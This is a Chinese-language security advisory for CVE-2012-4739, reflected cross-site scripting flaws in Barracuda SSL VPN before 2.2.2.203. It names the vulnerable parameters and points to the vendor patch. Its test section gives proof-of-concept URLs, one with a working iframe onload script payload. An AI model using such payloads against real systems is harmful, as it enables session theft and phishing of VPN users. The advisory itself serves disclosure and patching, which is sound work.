发布日期：2012-07-18
更新日期：2012-09-04

受影响系统：

Barracuda Networks SSL VPN 680

描述：

---

BUGTRAQ  ID: 54593
CVE ID: CVE-2012-4739

Barracuda SSL VPN是集硬件和软件于一体的解决方案，可保证从任何浏览器安全地无客户端地远程访问内部网络资源。

Barracuda SSL VPN 2.2.2.203之前版本存在多个XSS漏洞，通过showUserResourceCategories.do内的policyLaunching、resourcePrefix、actionPath参数，传递到fileSystem.do内的list、path参数，传递到launchAgent.do的return-To参数，可允许远程攻击者注入Web脚本或HTML代码。

<*来源：Benjamin Kunz Mejri
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

www.example.com/resourceList.do?form=resourceCategoriesForm&amp;readOnly=test&amp;path=
%2FshowUserResourceCategories.do&amp;messageResourcesKey=resourceCategory&amp;actionPath=[NON-PERSISTENT SCRIPT CODE!]

www.example.com/[FILE].do?[VALUE #1]=l52ca6d&amp;[VALUE #2]=[VALUE #3]&amp;[PATH LISTING]=smb/Sales%20Folder/Opt/[NON-PERSISTENT SCRIPT CODE!]

www.example.com/fileSystem.do?launchId=l52ca6d&amp;actionTarget=list&amp;path=smb/Sales%20Folder/Testing %20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

www.example.com/launchAgent.do?launchId=l3ce418&amp;returnTo=[NON-PERSISTENT SCRIPT CODE!]

建议：

---

厂商补丁：

Barracuda Networks
------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.barracudanetworks.com/ns/products/spam_overview.php

浏览次数：2177
严重程度：0（网友投票）